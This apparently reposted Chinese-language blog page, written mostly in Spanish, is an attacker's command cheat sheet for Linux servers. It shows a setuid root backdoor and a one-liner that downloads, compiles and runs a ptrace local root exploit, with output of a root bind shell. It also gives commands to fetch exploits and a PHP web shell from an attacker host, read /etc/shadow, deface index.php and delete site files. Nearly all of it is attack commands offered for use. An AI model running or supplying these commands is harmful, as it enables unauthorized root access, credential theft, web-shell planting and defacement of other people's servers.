| 关键词: cnbird exploit root localhost tmp compilado ptrace aqui Fichero groups |
by:cnbird 1. [cnbird@localhost tmp]#id uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk) [cnbird@localhost tmp]#cp `which id ` . [cnbird@localhost tmp]#chown root ./id [cnbird@localhost tmp]#chmod 755 ./id ; chmod u+s ./id [cnbird@localhost tmp]#ls -l ./id -rwsr-xr-x 1 root root 9264 Mar 8 21:36 ./id* [cnbird@localhost tmp]#exit [cnbird@localhost tmp]$id uid=500(cnbird) gid=500(cnbird) groups=500(cnbird) [cnbird@localhost tmp]$./id uid=500(cnbird) gid=500(cnbird) euid=0(root) groups=500(cnbird) 2.利用ptrace成为root的方法 [bash]# cd /tmp/; wget http://delivered.informaticahispana.org/ptrace.c; gcc ptrace.c -o ptrace; chmod -c 777 ptrace; ./ptrace-> Parent's PID is 2313. Child's PID is 2314.-> Attaching to 2315...-> Got the thread!!-> Waiting for the next signal...-> Injecting shellcode at 0x4000e85d-> Bind root shell on port 24876... =p-> Detached from modprobe thread.-> Committing suicide..... [bash]# iduid=0(root) gid=0(root) groups=0(root) Para ver los dominios que hay en el server:---------------------------------------------------------cat /etc/httpd/conf/httpd.conf|grep ServerName << Solo salen los dominioscat /etc/httpd/conf/httpd.conf << Unicamente los puros dominioscat /etc/localdomains << Unicamente los dominios localescat /etc/trueuserdomains << Revela los verdades propietarios de cada dominio cat /etc/userdomains << Este es el mas comun--------------------------------------------------------- Para ver la version de kernel:---------------------------------------------------------uname -a <<Te sale algo asi Linux itys.host4u.net 2.4.20....., 2.4.20 viene siendo la version del kernel.--------------------------------------------------------- Para modificar un index ya existente:---------------------------------------------------------echo "RootBox was OwNz You">index.php <<sobreescribe el archivo index.php con nuevo contenido--------------------------------------------------------- Para subir, compilar, darle permisos de ejecucion y ejecutar un exploit:---------------------------------------------------------cd /tmp/;wget http://web_atacante/exploit.c <<aqui subimos el exploitcd /tmp/;cc exploit.c -o exploit_compilado <<aqui lo compilamos con el nombre de "exploit_compilado" cd /tmp/;chmod -c 777 exploit_compilado <<aqui le damos permisos de ejecucion a "exploit_compilado"cd /tmp/;./exploit_compilado <<aqui estamos ejecutando a "exploit_compilado". Hasta aqui termina el proceso para un exploit.--------------------------------------------------------- Ver las contraseñas encriptadas de todos los usuarios:---------------------------------------------------------cat /etc/shadow <<Solo funciona si tienes permisos como root.--------------------------------------------------------- Borrar un Fichero:---------------------------------------------------------cd /home/juan/public_html/;rm import.htm<<aqui estan borrando con el comando rm, el fichero import.htm--------------------------------------------------------- Subir un fichero:---------------------------------------------------------cd /home/juan/public_html/;wget http://web_atacante/shell.php<<Estamos subiendo el fichero shell.php |
|
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系
[邮箱地址] 删除
|